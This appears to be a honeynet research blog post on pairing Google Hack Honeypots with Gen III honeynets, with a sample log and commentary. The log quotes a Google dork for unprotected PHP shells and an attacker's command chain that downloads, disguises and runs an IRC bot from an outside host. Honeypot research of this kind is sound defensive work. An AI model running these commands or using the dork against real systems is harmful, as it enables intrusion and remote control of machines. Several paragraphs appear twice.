Integrating Google Hack and GenIII Honeypots
Together with Ryan McGeehan from the Google Hack Honeypot (GHH) team I have written a short summary of how current Gen III honeynets and GHHs could be integrated. Essentially, we are adding advertisement to honeypot technology. That is all this really comes down to. The tricky part is how it is advertised to reduce false positives, which we will design after we know what resources we will be using. But due to this advertisement, we will be able to attract a new class of attackers and learn about new tools.
Furthermore, this is a way to learn more about targeted attacks. So instead of blind scanning, this is more like a hitlist that is generated with the help of different search engines. This is a new aspect in the area of "classical" GenIII honeypots since they have no real way to attract attackers and to learn more about targeted attacks.
The basic ideas are
There is also an elaborated version available.
And for those of you who have not seen a logfile of a GHH, here is a short sample:
In the first log entry, we see that the attacker finds the GHH with the help of a query to google (corresponding Google Hacking Database entry). He searches for vulnerable versions of "PHP Shell", a shell wrapped in a PHP script. If this script is not protected by some form of authentication, it allows a remote attacker to execute arbitrary commands. The google query itself searches for web sites that have unprotected PHP shells running ("enable stderr"). Shortly after this access, the same attacker requests the PHP shell and tries to execute a command. This is the test whether the PHP shell really allows arbitrary commands. Since we are only running a honeypot, the attacker will notice the difference. But at least we have found a way to learn more about this kind of attacks.
In the third example we see a more complex command that would be executed. The attacker tries to setup automatically an IRC bot that would allow him a remote control mechanism to the compromised machine via this bot.
Furthermore, this is a way to learn more about targeted attacks. So instead of blind scanning, this is more like a hitlist that is generated with the help of different search engines. This is a new aspect in the area of "classical" GenIII honeypots since they have no real way to attract attackers and to learn more about targeted attacks.
The basic ideas are
- Redirecting traffic from GHHs to GenIII honeypots
- Analyzing GHH logfiles with the help of GenIII honeypots
- Generating GHHs with the help of information collected with GenIII honeypots
- Cooperation with Google or other search engines to improve data capture capabilities
There is also an elaborated version available.
And for those of you who have not seen a logfile of a GHH, here is a short sample:
PHPSHELL,01-09-2006 09:47:29 AM, XXX.70.107.165,
/shell/phpshell.php,http://www.google.com/search?
num=100hl=enlr=ie=UTF8safe=offq=intitle%3A%
22PHP+Shell+*%22+%22Enable+
stderr%22+filetype%3AphpbtnG=Search,
text/xml application/xml application/xhtml+xml
text/html;q=0.9 text/plain;q=0.8 image/png /*;
q=0.5,ISO 8859 1 utf 8;q=0.7 ;q=0.7,gzip deflate,de
de de;q=0.8 en us;q=0.5 en;q=0.3,keep alive,300,
Mozilla/5.0 (Windows; U; Windows NT 5.2; de;
rv:1.8) Gecko/20051111 Firefox/1.5,
Known Search Engine: google.com;Target in URL;
PHPSHELL,01-09-2006 09:47:48 AM, XXX.70.107.165,
/shell/phpshell.php,http://[REMOVED]/shell/phpshell.php,
text/xml application/xml application/xhtml+xml
text/html;q=0.9 text/plain;q=0.8 image/png /*;q=0.5,
ISO 8859 1 utf 8;q=0.7 ;q=0.7,gzip deflate,de de de;
q=0.8 en us;q=0.5 en;q=0.3,keep alive,300,Mozilla/5.0
(Windows; U; Windows NT 5.2; de; rv:1.8)
Gecko/20051111 Firefox/1.5,ls;
PHPSHELL,01-09-2006 11:02:29 AM, XXX.137.186.13,
/shell/phpshell.php,http://[REMOVED]/shell/phpshell.php,
image/gif image/x xbitmap image/jpeg image/pjpeg
application/x shockwave flash application/vnd.ms
excel application/vnd.ms powerpoint application/msword
*/*,,gzip deflate,en us,Keep Alive,,Mozilla/4.0 (
compatible; MSIE 6.0; Windows NT 5.1; SV1),
cd /tmp/.kupdate;wget XXX.home.ro/mech.tar.gz;
tar -zxvf mech.tar.gz;rm -rf mech.tar.gz;
mv mech netstat;cd netstat; rm -rf mech.set;
wget adultzone.home.ro/mech.set;mv mech uptime;
chmod +x uptime;PATH=:$PATH;uptime;ps x;
In the first log entry, we see that the attacker finds the GHH with the help of a query to google (corresponding Google Hacking Database entry). He searches for vulnerable versions of "PHP Shell", a shell wrapped in a PHP script. If this script is not protected by some form of authentication, it allows a remote attacker to execute arbitrary commands. The google query itself searches for web sites that have unprotected PHP shells running ("enable stderr"). Shortly after this access, the same attacker requests the PHP shell and tries to execute a command. This is the test whether the PHP shell really allows arbitrary commands. Since we are only running a honeypot, the attacker will notice the difference. But at least we have found a way to learn more about this kind of attacks.
In the third example we see a more complex command that would be executed. The attacker tries to setup automatically an IRC bot that would allow him a remote control mechanism to the compromised machine via this bot.
".
